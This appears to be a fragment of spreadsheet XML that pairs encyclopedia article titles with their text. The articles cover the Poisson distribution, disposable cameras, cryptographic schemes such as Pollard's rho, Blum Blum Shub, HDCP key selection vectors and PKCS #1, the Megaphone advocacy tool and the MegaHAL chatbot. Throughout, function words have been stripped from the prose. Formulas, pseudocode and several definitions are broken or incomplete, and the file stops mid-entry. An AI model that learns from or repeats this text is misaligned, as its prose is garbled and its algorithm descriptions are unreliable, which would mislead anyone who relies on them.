contribution single occurrence, even contribution small detected directly. example, charge electron estimated correlating magnitude electric current shot noise. electrons pass point given time average, mean current {\displaystyle i=en/t} since current fluctuations order {\displaystyle \sigma _{i}=e{\sqrt {n}}/t} (i.e., standard deviation poisson process), charge {\displaystyle estimated ratio {\displaystyle t\sigma _{i}^{2}/i} everyday example graininess appears photographs enlarged; graininess poisson fluctuations number reduced silver grains, individual grains themselves. correlating graininess degree enlargement, estimate contribution individual grain (which otherwise small seen unaided). many molecular applications poisson noise developed, e.g., estimating number density receptor molecules cell membrane. {\displaystyle \pr(n_{t}=k)=f(k;\lambda t)={\frac {(\lambda t)^{k}e^{-\lambda t}}{k!}}.} causal theory discrete elements spacetime follow poisson distribution volume. computational methods poisson distribution poses different tasks dedicated software libraries: evaluating distribution {\displaystyle p(k;\lambda drawing random numbers according distribution. evaluating poisson distribution computing {\displaystyle p(k;\lambda given {\displaystyle {\displaystyle \lambda trivial task accomplished using standard definition {\displaystyle p(k;\lambda terms exponential, power, factorial functions. however, conventional definition poisson distribution contains terms easily overflow computers: fraction also produce rounding error large compared e−λ, therefore give erroneous result. numerical stability poisson probability mass function therefore evaluated {\displaystyle \!f(k;\lambda )=\exp \left[k\ln \lambda -\lambda -\ln \gamma (k+1)\right],} mathematically equivalent numerically stable. natural logarithm gamma function obtained using lgamma function standard library (c99 version) gammaln function matlab scipy, log_gamma function fortran 2008 later. some computing languages provide built-in functions evaluate poisson distribution, namely function dpois(x, lambda); excel: function poisson( mean, cumulative), flag specify cumulative distribution; mathematica: univariate poisson distribution poissondistribution[ {\displaystyle \lambda bivariate poisson distribution multivariatepoissondistribution[ {\displaystyle \theta _{12}} {\displaystyle \theta _{1}-\theta _{12}} {\displaystyle \theta _{2}-\theta _{12}} }],. random drawing poisson distribution less trivial task draw random integers poisson distribution given {\displaystyle \lambda solutions provided function rpois(n, lambda); scientific library (gsl): function gsl_ran_poisson generating poisson-distributed random variables simple algorithm generate random poisson-distributed numbers (pseudo-random number sampling) given knuth:: 137-138 algorithm poisson random number (knuth): init: e−λ, generate uniform random number [0,1] return complexity linear returned value average. there many algorithms improve this. some given ahrens dieter, references below. large values value small hard represent. this solved change algorithm uses additional parameter step e−step underflow: algorithm poisson random number (junhao, based knuth): init: λleft generate uniform random number (0,1) λleft λleft step: estep λleft λleft step else: eλleft λleft return choice step depends threshold overflow. double precision floating point format threshold near e700, safe step. other solutions large values include rejection sampling using gaussian approximation. inverse transform sampling simple efficient small values requires uniform random number sample. cumulative probabilities examined turn exceeds algorithm poisson generator based upon inversion sequential search:: init: e−λ, generate uniform random number [0,1]. return also references citations sources</t>
  </si>
  <si>
    <t>Disposable camera</t>
  </si>
  <si>
    <t>disposable single-use camera simple camera meant used once. most fixed-focus lenses. some equipped integrated flash unit, even waterproof versions underwater photography. internally, cameras film cartridge. while disposables contain actual cartridge used loading normal, reusable cameras, others film wound internally open spool. whole camera handed processing. some cameras recycled, i.e. refilled film resold. cameras returned "processing" fashion film cameras. general one-time-use camera represents return business model pioneered kodak kodak camera, predecessor brownie camera; particularly popular situations reusable camera would easily stolen damaged, one's regular camera forgotten, cannot afford regular camera. history company called photo-pac produced cardboard camera beginning 1949 shot eight exposures mailed-in processing. cameras expensive, would often left safely home lovely scenes presented themselves. frustrated missing photo opportunities, stiles invented enclose 35mm film inexpensive enclosure without expensive precision film transport mechanism. cost $1.29. though incredibly similar familiar single-use cameras today, photo-pac failed make permanent impression market.in 1966, french company called introduced disposable bakelite camera called "photo pack matic", featuring photos (4×4 cm).the currently familiar disposable camera developed fujifilm 1986. their utsurun-desu ("it takes pictures") quicksnap line used film, eastman kodak's 1987 fling based film. kodak released version 1988, 1989 renamed version funsaver discontinued fling.in japan, utsurun released 1986 1380 became widely accepted. because immediate appeal, companies like konica, canon nikon soon produced models. stay competitive, fuji introduced advanced features original model panoramic photography, waterproofing inclusion flash. some cameras even manual zoom feature works shifting lenses front shutter. 2005 disposable cameras staple consumer film camera market flash-equipped disposables norm. disposable camera used delivery method mission briefing film mission: impossible (2006). common uses disposable cameras popular tourists people traveling around world save pictures adventures. since late 1990s, disposable cameras become increasingly popular wedding favors. usually placed tables wedding receptions used guests capture unique perspective event. more commonly available colors match wedding theme ivory, blue, white, gold, etc.so-called "accident camera kits" containing film-based disposable cameras increasingly carried vehicles take images evidence accident. absence batteries allows instantaneous usage even extended storage, example glove compartment. they often cheap plastic lenses, questionable film quality, fixed focal lengths quick 'point shoot' ease make disposable camera popular many photographers enjoy 'less perfect' style cameras provide, move away digital imagery, also seen rise popularity 'lomography'. this also number 'lost art' type projects disposable cameras left public spaces message anyone finding camera take images post camera back, pass another person. cost cameras makes perfect tool sorts projects. digital digital one-time-use cameras (and also digital one-time-use camcorders) available markets; example introduction digital camera 2004. digital disposables success film based counterparts, possibly expense process (especially compared normal digital camera use) poor quality images compared either typical digital camera, disposable film camera. usually, display shows number shots remaining, completed, camera returned store. digital files extracted camera, return keeping camera, printed stored case video camera customer. almost digital 'single use' cameras successfully hacked eliminate need return store. motivations hacking include saving money and, commonly, challenge overcoming artificial impositions (such shot limit internal memory store images). other uses high-voltage photo flash capacitors cameras sometimes extracted used power devices coil guns, stun guns, homemade geiger counter projects "rfid zapper" devices. also planned obsolescence references external links science channel's making series: recycling single-use cameras (video) kodak collection, single cameras page remy steller collection, single cameras page christophe duchesne</t>
  </si>
  <si>
    <t>Pointcheval–Stern signature algorithm</t>
  </si>
  <si>
    <t>cryptography, pointcheval–stern signature algorithm digital signature scheme based closely related elgamal signature scheme. changes elgamal scheme slightly produce algorithm proven secure strong sense adaptive chosen-message attacks, assuming discrete logarithm problem intractable strong sense.david pointcheval jacques stern developed forking lemma technique constructing proof algorithm. used security investigations various cryptographic algorithms. references</t>
  </si>
  <si>
    <t>IPVM</t>
  </si>
  <si>
    <t>ipvm security surveillance industry research group based united states. ipvm gained recognition 2020 2021 reporting thermal imaging cameras covid-19 pandemic covering prc-based technology firms alibaba, dahua technology, huawei megvii filed patents face detection technology designed target uyghurs. history 2008, john honovich launched ipvm, initialism internet protocol video market, hawaii. website's first article published april 2008.in october 2018, reporters without borders condemned chinese government’s decision block ipvm's website behind great firewall.in december 2019, ipvm opened 12,000 (1,115 research facility bethlehem, pennsylvania tests video surveillance hardware software manufacturers anyvision, avigilon, axis communications, dahua, hikvision.in march 2021, journal biomedical optics published study five ipvm researchers u.s. military medical service officer problems covid-19 fever screening devices. study funded ipvm conducted pennsylvania research facility.in september 2021, ipvm named kean university professor former york times upfront editor carl stoffers managing editor.in 2022, ipvm research informed criticism york city mayor eric adams's plan enhance security public hospitals, schools, subways evolv weapons detection systems technology's propensity false alarms. china technology companies' involvement uyghur genocide 2021, aired scared yet, human?, panorama documentary featuring interview ipvm dahua technology's, hikvision's, huawei's roles developing mass surveillance technologies china, including technological products designed identify uyghurs. september 2021, ipvm presented expert statement uyghur tribunal united kingdom.in 2022, ipvm, association ethan gutmann victims communism memorial foundation chinaaid, among others, helped ovalbek turdakun, kyrgyz christian xinjiang internment camps survivor, escape united states, granted significant public benefit parole. turdakun gave first-person witness testimony alleged detention april press conference ipvm's conor healy victims communism memorial foundation. joint investigations 2020, washington post ipvm jointly reported huawei's testing facial recognition technology designed identify uyghurs.in 2021, ipvm partnered techcrunch examine u.s. local governments' purchases u.s. retailers' sales surveillance equipment manufactured companies linked uyghur abuses well intercept investigate u.s. military's purchase sanctioned cameras u.s. embassy caracas.in 2022, ipvm partnered technology review examine israeli company's plan develop dna-based facial recognition cited espn exposé brooklyn nets owner joseph tsai discussing alibaba's, megvii's sensetime's uyghur-targeting software. controversies hikvision july 2021, hikvision resigned membership security industry association, u.s.-based trade association, citing resignation letter "harassed maligned" ipvm. hikvision claimed ipvm engaged "unethical hacking" cameras ipvm published "misleading blog stories."in january 2022, axios reported hikvision asked u.s. congressional ethics officials investigate potential lobbying disclosure violations ipvm. u.s. senator marco rubio congresswoman claudia tenney retweeted axios article, urging congressional colleagues ignore hikvision claiming hikvision's accusations ipvm amounted censorship. global times november 2021, global times, tabloid auspices chinese communist party, published article writing name 耿直哥, candid brother, baidu wechat accounts criticizing ipvm u.s. government mouthpiece parading civilian company. also compared ipvm founder john honovich german anthropologist adrian zenz claimed another ipvm employee rather extreme white right-winger." china daily january 2022, china daily, chinese communist party-owned newspaper, published article video noting ipvm's work bbc, york times, reuters, washington post, criticizing "mass surveillance company" "been sharing tons data collected xinjiang chinese entities." references</t>
  </si>
  <si>
    <t>Distributed key generation</t>
  </si>
  <si>
    <t>distributed generation (dkg) cryptographic process multiple parties contribute calculation shared public private set. unlike public encryption models, distributed generation rely trusted third parties. instead, participation threshold honest parties determines whether pair computed successfully. distributed generation prevents single parties access private key. involvement many parties requires distributed generation ensure secrecy presence malicious contributions calculation.distributed generation commonly used decrypt shared ciphertexts create group digital signatures. history distributed generation protocol first specified torben pedersen 1991. this first model depended security joint-feldman protocol verifiable secret sharing secret sharing process.in 1999, rosario gennaro, stanislaw jarecki, hugo krawczyk, rabin produced series security proofs demonstrating feldman verifiable secret sharing vulnerable malicious contributions pedersen's distributed generator would leak information shared private key. group also proposed updated distributed generation scheme preventing malicious contributions impacting value private key. methods distributed generation protocol specified gennaro, jarecki, krawczyk, rabin assumes group players already established honest party prior generation. also assumes communication parties synchronous. parties pedersen's verifiable secret sharing protocol share results random polynomial functions. every party verifies shares received. verification fails, recipient broadcasts complaint party whose share failed. each accused party broadcasts shares. each party opportunity verify broadcast shares disqualify accused parties. parties generate common list non-disqualified parties. each non-disqualified party broadcasts values constructed raising common generator power value used polynomial part these broadcast values verified party similarly part when verification fails, party broadcasts values received part values received part party verifiable complaints, parties reconstruct value sets order eliminate disqualified contributions. group computes private product every qualified contribution (each qualified party's random polynomial evaluated avoiding synchrony assumption 2009, aniket kate goldberg presented distributed generation protocol suitable internet. unlike earlier constructions, protocol require broadcast channel synchronous communication assumption, ready-to-use library available. robustness many circumstances, robust distributed generator necessary. robust generator protocols reconstruct public keys order remove malicious shares even malicious parties still remain qualified group reconstruction phase. example, robust multi-party digital signatures tolerate number malicious users roughly proportionate length modulus used generation. sparse evaluated distributed generators implement sparse evaluation matrix order improve efficiency verification stages. sparse evaluation improve time {\displaystyle o(nt)} (where {\displaystyle number parties {\displaystyle threshold malicious users) {\displaystyle o(log^{3}n)} instead robust verification, sparse evaluation requires small parties verify small, randomly picked shares. this results small probability generation fail case large number malicious shares chosen verification. applications distributed generation distributed cryptography rarely applied internet reliance synchronous communication.distributed cryptography useful escrow services company meet threshold decrypt ciphertext version private key. this company require multiple employees recover private without giving escrow service plaintext copy.distributed generation also useful server-side password authentication. password hashes stored single server, breach server would result password hashes available attackers analyze offline. variations distributed generation authenticate user passwords across multiple servers eliminate single points failure.distributed generation commonly used group digital signatures. this acts form voting, threshold group members would participate order group digitally sign document. references</t>
  </si>
  <si>
    <t>Distributed point function</t>
  </si>
  <si>
    <t>cryptography, distributed point function cryptographic primitive allows distributed processes share piece information, compute functions shared information, without revealing information either process. form secret sharing. given values {\displaystyle {\displaystyle define point function {\displaystyle p_{a,b}(x)} variant kronecker delta function) {\displaystyle p_{a,b}(x)={\begin{cases}b\qquad {\text{for }}x=a\\0\qquad {\text{for }}x\neq a\end{cases}}} that zero everywhere except {\displaystyle value {\displaystyle distributed point function consists family functions {\displaystyle f_{k}} parameterized keys {\displaystyle method deriving keys {\displaystyle {\displaystyle input values {\displaystyle {\displaystyle {\displaystyle {\displaystyle p_{a,b}(x)=f_{q}(x)\oplus f_{r}(x),} {\displaystyle \oplus denotes bitwise exclusive function values. however, given keys, values {\displaystyle indistinguishable random. known construct efficient distributed point function another cryptographic primitive, one-way function. direction, distributed point function known, possible perform private information retrieval. simplified example this, possible test whether {\displaystyle belongs replicated distributed database without revealing database servers (unless collude other) sought. find {\displaystyle database, create distributed point function {\displaystyle p_{a,1}(x)} send resulting keys {\displaystyle {\displaystyle different servers holding copies database. each copy applies function {\displaystyle f_{q}} {\displaystyle f_{r}} keys copy database, returns exclusive results. returned values differ {\displaystyle belongs database, equal otherwise. references gilboa, niv; ishai, yuval (2014), "distributed point functions applications", nguyen, phong oswald, elisabeth (eds.), advances cryptology eurocrypt 2014: 33rd annual international conference theory applications cryptographic techniques, copenhagen, denmark, 11-15, 2014, proceedings (pdf), lecture notes computer science, vol. 8441, springer, 640–658, doi:10.1007/978-3-642-55220-5_35</t>
  </si>
  <si>
    <t>Mimic function</t>
  </si>
  <si>
    <t>mimic function changes file {\displaystyle assumes statistical properties another file {\displaystyle that {\displaystyle p(t,a)} probability substring {\displaystyle occurring {\displaystyle mimic function {\displaystyle recodes {\displaystyle {\displaystyle p(t,f(a))} approximates {\displaystyle p(t,b)} strings {\displaystyle length less {\displaystyle commonly considered basic techniques hiding information, often called steganography. simplest mimic functions simple statistical models pick symbols output. statistical model says item {\displaystyle occurs probability {\displaystyle p(x,a)} item {\displaystyle occurs probability {\displaystyle p(y,a)} random number used choose outputting {\displaystyle {\displaystyle probability {\displaystyle p(x,a)} {\displaystyle p(y,a)} respectively. even sophisticated models reversible turing machines. references wayner, peter (december 1990). mimic functions (report). cornell university department computer science. 90-1176. wayner, peter (july 1992). "mimic functions". cryptologia. (3): 193–214. doi:10.1080/0161-119291866883. wayner, peter (2008). disappearing cryptography (3rd ed.). morgan kaufmann. isbn 978-0123744791.</t>
  </si>
  <si>
    <t>Pollard's rho algorithm</t>
  </si>
  <si>
    <t>pollard's algorithm algorithm integer factorization. invented john pollard 1975. uses small amount space, expected running time proportional square root size smallest prime factor composite number factorized. core ideas algorithm used factorize number {\displaystyle n=pq} {\displaystyle non-trivial factor. polynomial modulo {\displaystyle called {\displaystyle g(x)} (e.g., {\displaystyle g(x)=(x^{2}+1){\bmod {n}}} used generate pseudorandom sequence: starting value, chosen, sequence continues {\displaystyle x_{1}=g(2)} {\displaystyle x_{2}=g(g(2))} {\displaystyle x_{3}=g(g(g(2)))} etc. sequence related another sequence {\displaystyle \{x_{k}{\bmod {p}}\}} since {\displaystyle known beforehand, sequence cannot explicitly computed algorithm. yet, lies core idea algorithm. because number possible values sequences finite, {\displaystyle \{x_{k}\}} sequence, {\displaystyle {\displaystyle \{x_{k}{\bmod {p}}\}} sequence eventually repeat, even though values unknown. sequences behave like random numbers, birthday paradox implies number {\displaystyle x_{k}} repetition occurs would expected {\displaystyle o({\sqrt {n}})} {\displaystyle number possible values. sequence {\displaystyle \{x_{k}{\bmod {p}}\}} likely repeat much earlier sequence {\displaystyle \{x_{k}\}} when found {\displaystyle k_{1},k_{2}} {\displaystyle x_{k_{1}}\neq x_{k_{2}}} {\displaystyle x_{k_{1}}\equiv x_{k_{2}}{\bmod {p}}} number {\displaystyle |x_{k_{1}}-x_{k_{2}}|} multiple {\displaystyle {\displaystyle found. once sequence repeated value, sequence cycle, value depends this structure eventual cycling gives rise name "rho algorithm", owing similarity shape greek letter values {\displaystyle x_{1}{\bmod {p}}} {\displaystyle x_{2}{\bmod {p}}} etc. represented nodes directed graph. this detected floyd's cycle-finding algorithm: nodes {\displaystyle {\displaystyle (i.e., {\displaystyle x_{i}} {\displaystyle x_{j}} kept. step, moves next node sequence moves forward nodes. after that, checked whether {\displaystyle \gcd(x_{i}-x_{j},n)\neq implies repetition {\displaystyle \{x_{k}{\bmod {p}}\}} sequence (i.e. {\displaystyle x_{i}{\bmod {p}}=x_{j}{\bmod {p}})} this works {\displaystyle x_{i}} {\displaystyle x_{j}} difference {\displaystyle x_{i}} {\displaystyle x_{j}} necessarily multiple {\displaystyle although always happens eventually, resulting greatest common divisor (gcd) divisor {\displaystyle this {\displaystyle itself, since sequences might repeat time. (uncommon) case algorithm fails, repeated different parameter. algorithm algorithm takes inputs integer factored; {\displaystyle g(x)} polynomial computed modulo original algorithm, {\displaystyle g(x)=(x^{2}-1){\bmod {n}}} nowadays common {\displaystyle g(x)=(x^{2}+1){\bmod {n}}} output either non-trivial factor failure. performs following steps: g(x) g(g(y)) gcd(|x return failure else: return here corresponds {\displaystyle x_{i}} {\displaystyle x_{j}} previous section. note algorithm fail find nontrivial factor even composite. case, method tried again, using starting value different {\displaystyle g(x)} example factorization 8051 {\displaystyle n=8051} {\displaystyle g(x)=(x^{2}+1){\bmod {8}}051} non-trivial factor 8051. starting values give cofactor (83) instead extra iteration shown make clear moves twice fast note even repetition, return variants 1980, richard brent published faster variant algorithm. used core ideas pollard different method cycle detection, replacing floyd's cycle-finding algorithm related brent's cycle finding method.a improvement made pollard brent. they observed {\displaystyle \gcd(a,n)&gt;1} also {\displaystyle \gcd(ab,n)&gt;1} positive integer {\displaystyle particular, instead computing {\displaystyle \gcd(|x-y|,n)} every step, suffices define {\displaystyle product consecutive {\displaystyle |x-y|} terms modulo {\displaystyle compute single {\displaystyle \gcd(z,n)} major speed results steps replaced multiplications modulo {\displaystyle single gcd. occasionally cause algorithm fail introducing repeated factor, instance {\displaystyle square. suffices back previous term, {\displaystyle \gcd(z,n)=1} regular algorithm there. application algorithm fast numbers small factors, slower cases factors large. algorithm's remarkable success 1980 factorization fermat number 1238926361552897 93461639715357977769163558199606896584051237541638188580280321. algorithm good choice prime factor 1238926361552897 much smaller factor. factorization took hours univac 1100/42. example: factoring 10403 following table shows numbers produced algorithm, starting {\displaystyle x=2} using polynomial 0403 {\displaystyle g(x)=(x^{2}+1){\bmod {1}}0403} third fourth columns table contain additional information known algorithm. they included show algorithm works. first repetition modulo occurs step repetition detected step {\displaystyle x\equiv y{\pmod {101}}} this causes 2799 9970 {\displaystyle \gcd(x-y,n)=\gcd(2799-9970,n)} {\displaystyle p=101} factor found. complexity pseudorandom number {\displaystyle x=g(x)} occurring pollard algorithm actual random number, would follow success would achieved half time, birthday paradox {\displaystyle o({\sqrt {p}})\leq o(n^{1/4})} iterations. believed analysis applies well actual algorithm, heuristic claim, rigorous analysis algorithm remains open. also pollard's algorithm logarithms pollard's kangaroo algorithm references further reading katz, jonathan; lindell, yehuda (2007). "chapter introduction modern cryptography. press. samuel wagstaff, (2013). factoring. providence, american mathematical society. 135–138. isbn 978-1-4704-1048-3. external links comprehensive article pollard's algorithm aimed introductory-level audience weisstein, eric "pollard factorization method". mathworld. java implementation about pollard</t>
  </si>
  <si>
    <t>Dual basis in a field extension</t>
  </si>
  <si>
    <t>mathematics, linear algebra concept dual basis applied context finite extension l/k, using field trace. this requires property field trace trl/k provides non-degenerate quadratic form this guaranteed extension separable; automatically true perfect field, hence cases finite, characteristic zero. dual basis concrete basis like polynomial basis normal basis; rather provides using second basis computations. consider bases elements finite field, gf(pm): {\displaystyle b_{1}={\alpha _{0},\alpha _{1},\ldots ,\alpha _{m-1}}} {\displaystyle b_{2}={\gamma _{0},\gamma _{1},\ldots ,\gamma _{m-1}}} considered dual basis provided otherwise {\displaystyle \operatorname {tr} (\alpha _{i}\cdot \gamma _{j})=\left\{{\begin{matrix}0,&amp;\operatorname {if} i\neq j\\1,&amp;\operatorname {otherwise} \end{matrix}}\right.} here trace value gf(pm) calculated follows: {\displaystyle \operatorname {tr} (\beta )=\sum _{i=0}^{m-1}\beta ^{p^{i}}} using dual basis provide easily communicate devices different bases, rather explicitly convert bases using change bases formula. furthermore, dual basis implemented conversion element original basis dual basis accomplished multiplication multiplicative identity (usually references lidl, rudolf; niederreiter, harald (1994). introduction finite fields applications. cambridge: cambridge university press. doi:10.1017/cbo9781139172769. isbn 9781139172769., definition 2.30,</t>
  </si>
  <si>
    <t>Blum Blum Shub</t>
  </si>
  <si>
    <t>blum blum shub (b.b.s.) pseudorandom number generator proposed 1986 lenore blum, manuel blum michael shub derived michael rabin's one-way function. blum blum shub takes form {\displaystyle x_{n+1}=x_{n}^{2}{\bmod {m}}} ,where product large primes step algorithm, output derived xn+1; output commonly either parity xn+1 least significant bits xn+1. seed integer co-prime (i.e. factors primes, congruent (mod (this guarantees quadratic residue square root also quadratic residue), safe primes small gcd((p-3)/2, (q-3)/2) (this makes cycle length large). interesting characteristic blum blum shub generator possibility calculate value directly (via euler's theorem): {\displaystyle x_{i}=\left(x_{0}^{2^{i}{\bmod {\lambda }}(m)}\right){\bmod {m}}} ,where {\displaystyle \lambda carmichael function. (here {\displaystyle \lambda (m)=\lambda (p\cdot q)=\operatorname {lcm} (p-1,q-1)} security there proof reducing security computational difficulty factoring. when primes chosen appropriately, o(log lower-order bits output, limit grows large, distinguishing output bits random least difficult solving quadratic residuosity problem modulo example {\displaystyle p=11} {\displaystyle q=23} {\displaystyle s=3} (where {\displaystyle seed). expect large cycle length small numbers, {\displaystyle {\rm {gcd}}((p-3)/2,(q-3)/2)=2} generator starts evaluate {\displaystyle x_{0}} using {\displaystyle x_{-1}=s} creates sequence {\displaystyle x_{0}} {\displaystyle x_{1}} {\displaystyle x_{2}} {\displaystyle \ldots {\displaystyle x_{5}} 236, 202. following table shows output bits) different selection methods used determine output. following common lisp implementation provides simple demonstration generator, particular regarding three selection methods. important note requirements imposed upon parameters (seed) checked. references citations sources external links gmpbbs, c-language implementation mark rossmiller blumblumshub, java-language implementation mark rossmiller implementation java randomness tests</t>
  </si>
  <si>
    <t>Key selection vector</t>
  </si>
  <si>
    <t>selection vector (ksv) numerical identifier associated device distributed licensor designee adopters used support authentication licensed products revocation part hdcp copy protection system. used generate confidential keys, specifically used restricted authentication process hdcp. restricted authentication method devices limited computing resources. this method used copying devices kind (such recorders d-vhs recorders) devices communicating authenticating protected content. restricted authentication protocol uses asymmetric management common cryptography, relies shared secrets hash functions respond random challenge. restricted authentication protocol goal restricted authentication device prove holds secret shared devices. device authenticates another issuing random challenge response generated combining shared secrets multiple hashes. formally, selection vector 40-bit vector containing ones zeros, used specify random challenge. device collection 56-bit values, shared secrets protocol during authentication process, parties transmitter receiver) exchange ksvs. then device adds (unsigned addition modulo {\displaystyle 2^{56}} device secret keys according received another device. particular corresponding secret used addition otherwise ignored. keys special called (key selection vector) created. each exactly bits bits keys ksvs generated process devices number result. that number later used encryption process. uniqueness revocation ksvs since valid keys become compromised (hacked, instance reverse engineering hardware), hdcp scheme includes mechanism revoke keys. values unique and, therefore device. hdcp system compare values revocation list, authentication fails either transmitter receiver appears revocation list. updates revocation list arrive media automatically integrated device's revocation list. this means damage limited exposed copied. this revocation process affect devices, even devices make model. values similar serial numbers sense. example system works, customers model television store, first customer hacked television, first customer's could revoked without affecting ability customer's television play content. attacks restricted authentication attacker find linearly independent vectors {\displaystyle a_{1}} keys {\displaystyle a_{40}} )keys (i.e. vectors generated adding together device's device based ksv,) completely break hdcp system devices using given device set. point, extract secret array number ksvs, allows access shared secrets used hdcp authentication protocol. since keys generated ksvs produced linearly given system (i.e. getting viewed matrix multiplication), someone could determine device matrix 40-50 different systems: {\displaystyle a_{1}} .... {\displaystyle a_{n}} associated (this public information protocol). cases extracted keys linearly independent, still possible create xkey xksv within span {\displaystyle a_{i}} )ksvs taking linear combinations) private keys found. there however, guarantee satisfying required property must have; ones zeros. setting equations assuming {\displaystyle a_{i}} ksvs linearly independent (and naming xkeys matrix keys device set), gives linear equations unknowns [xkeys] (a1)ksv [(a1)keys] xksv[xkeys] (a2)ksv [(a2)keys] xksv...[xkeys] (a40)ksv [(a40)keys] xksv acknowledgment ksvs, assuming secret vectors {\displaystyle a_{i}} )keys known, algorithm used find secret keys produce derived arbitrary ksv. space spanned {\displaystyle a_{i}} )ksvs span full dimensional space, okay ksvs either designed span space, small number extra keys needed find vectors spanning full space. each additional device odds linearly dependent existing set. (roughly 1/2^[40-dimensionality-of-spanned-space]. this analysis probabilities linear dependence similar analysis simon's algorithm). also hdcp hash functions references external links apparent hdcp weaknesses</t>
  </si>
  <si>
    <t>Megaphone desktop tool</t>
  </si>
  <si>
    <t>megaphone desktop tool windows "action alert" tool developed give israel your united support (giyus) distributed world union jewish students, world jewish congress, jewish agency israel, world zionist organization, standwithus, hasbara fellowships, honestreporting, pro-israel public relations organizations. tool released july 2006 lebanon war. june 2011, tool longer available giyus website. newsfeed available. software megaphone desktop tool acted wrapper around feed giyus website. originally, gave user option going particular site poll, user chooses site, software casts vote automatically, technically feasible, feature discontinued. giyus tries save time effort locating voting form inside website, seemingly simple task prove quite confusing certain sites. whenever technically direct straight voting action. arrived poll results, means directed straight voting action already successfully voted. reason care vote, always thanks" link article alert popup. later versions, voting concept removed entirely tool directed users anti-israel websites, giving users option click button labeled "act now!" would direct user poll email address. software license provides remote updates: "you understand agree giyus.org provide updates, patches and/or versions software time time, including automatic updates installed computer, notice you, needed continue services, hereby authorize installations." press coverage according jerusalem post, amir gissin, head public affairs department foreign ministry israel, expressed support tool's use. "the foreign ministry pushing idea, urging supporters israel everywhere become cyberspace soldiers battleground israel's image." reports. computing website register described software "highly organised mass manipulation technologies supposed democratising" claimed megaphone "effectively high-tech exercise ballot-stuffing" register also reported history magazine website "noticed upsurge voting whether holocaust denial criminal offence britain. closing date already passed result already published, votes invalid anyway." stewart purvis, former editor-in-chief itn, noted independent panel reviewing bbc's israeli-palestinian coverage received large number letters north america accused anti-israeli. states evidence "pressure group involvement". commercialization following success megaphone tool, developers formed company collactive. 2007, collactive released "web assistant", general-purpose commercial version megaphone tool. reception tool received wide range reactions, praise criticism. amir gissin, head public affairs department israeli foreign ministry, praised tool, noting efficacy adnan hajj photographs controversy obtaining admission reuters news agency photograph adnan hajj improperly edited photo editing software. tool similarly praised number pro-israel organizations helping fight perceive anti-israel media bias. time, criticized independent television news, others stuffing ballot online polls, generating excessive comments 'spam' internet message boards, stifling online discussion seen mass, participatory form propaganda present june 2011, megaphone desktop tool unavailable download creators website. currently, alerts displayed giyus website feed. also act.il internet activism hasbara media coverage arab–israeli conflict arab–israeli conflict watchdog journalism media bias honestreporting committee accuracy middle east reporting america cent party references external links official website mission statement current list internet megaphone alerts</t>
  </si>
  <si>
    <t>Key signature (cryptography)</t>
  </si>
  <si>
    <t>cryptography, signature result third-party applying cryptographic signature representation cryptographic key. this usually done form assurance verification: "alice" signed "bob's" key, serve assurance another party, "eve", actually belongs bob, alice personally checked attested this. representation signed usually shorter itself, public-key signature schemes encrypt sign short lengths data. some derivative public fingerprint used, i.e. hash functions. also (cryptography) public certificate</t>
  </si>
  <si>
    <t>MegaHAL</t>
  </si>
  <si>
    <t>megahal computer conversation simulator, "chatterbot", created jason hutchens. background 1996, jason hutchens entered loebner prize contest hex, chatterbot based eliza. competition year took $2000 prize highest overall score. 1998, hutchens entered loebner prize contest program, megahal. megahal made debut 1998 loebner prize contest. like many chatterbots, intent megahal appear human fluent natural language. user types sentences megahal, megahal respond sentences sometimes coherent times complete gibberish. megahal learns conversation progresses, remembering words sentence structures. even learn ways substitute words phrases words phrases. many would consider conversation simulators like megahal primitive form artificial intelligence. however, megahal understand conversation even sentence structure. generates conversation based sequential mathematical relationships. world conversation simulators, megahal based relatively technology could considered primitive. however, popularity grown humorous nature; known respond twisted nonsensical statements often amusing. theory operation megahal based least part so-called "hidden markov model", first thing megahal "trains" script text build database text fragments encompassing every possible subset perhaps even consecutive words, example megahal trains declaration independence, megahal build database containing text fragments "when course", course of", "the course human", "course human events", human events, one", "human events, people", then megahal another text, "superman, yes! it's superman change course mighty rivers, bend steel bare hands disguised clark kent might induce megahal apparently bemuse proffer whether superman change course human events, something else altogether rambling "when course mighty rivers", thus likewise phrase like "the white house said" comes text; megahal's ability switch randomly different contexts otherwise share similarity result times surprising lucidity, else might otherwise seem quite bizarre. examples there sentences megahal generated: chess sport, when played with shot guns.and cows like clouds they never completely successful. distribution megahal distributed general public license (gpl). source code downloaded github repository. also loebner prize eliza references hutchens, jason alder, michael (1998), "introducing megahal" (pdf), nemlap3 conll98 workshop human-computer conversation, (271): external links github repository</t>
  </si>
  <si>
    <t>PKCS 1</t>
  </si>
  <si>
    <t>cryptography, pkcs first family standards called public-key cryptography standards (pkcs), published laboratories. provides basic definitions recommendations implementing algorithm public-key cryptography. defines mathematical properties public private keys, primitive operations encryption signatures, secure cryptographic schemes, related asn.1 syntax representations. current version (2012-10-27). compared (2002-06-14), republished 3447, version updates list allowed hashing algorithms align fips 180-4, therefore adding sha-224, sha-512/224 sha-512/256. keys pkcs standard defines mathematical definitions properties public private keys must have. traditional pair based modulus, product distinct large prime numbers, {\displaystyle n=pq} starting version 2.1, definition generalized allow multi-prime keys, number distinct primes more. when dealing multi-prime keys, prime factors generally labeled {\displaystyle r_{i}} that: {\displaystyle n=r_{1}r_{2}\cdots r_{i},} {\displaystyle i\geq notational convenience, {\displaystyle p=r_{1}} {\displaystyle q=r_{2}} public represented tuple {\displaystyle (n,e)} integer public exponent. private representations. first compact form tuple {\displaystyle (n,d)} private exponent. second form least five terms {\displaystyle (p,q,dp,dq,qinv)} multi-prime keys. although mathematically redundant compact form, additional terms allow certain computational optimizations using key. particular, second format allows derive public key. primitives standard defines several basic primitives. primitive operations provide fundamental instructions turning mathematical formulas computable algorithms. i2osp integer octet string primitive converts (potentially large) non-negative integer sequence bytes (octet string). os2ip octet string integer primitive interprets sequence bytes non-negative integer rsaep encryption primitive encrypts message using public rsadp decryption primitive decrypts ciphertext using private rsasp1 signature primitive creates signature message using private rsavp1 verification primitive verifies signature message using public schemes primitive operations necessarily provide security. concept cryptographic scheme define higher level algorithms uses primitives achieve certain security goals. there schemes encryption decryption: rsaes-oaep: improved encryption/decryption scheme; based optimal asymmetric encryption padding scheme proposed mihir bellare phillip rogaway. rsaes-pkcs1-v1_5: older encryption/decryption scheme first standardized version pkcs #1.note: small change made rsaes-oaep pkcs version 2.1, causing rsaes-oaep pkcs version totally incompatible rsa-oaep pkcs version version 2.2. there also schemes dealing signatures: rsassa-pss: improved probabilistic signature scheme appendix; based probabilistic signature scheme originally invented bellare rogaway. rsassa-pkcs1-v1_5: signature scheme appendix first standardized version pkcs #1.the signature schemes make separately defined encoding methods: emsa-pss: encoding 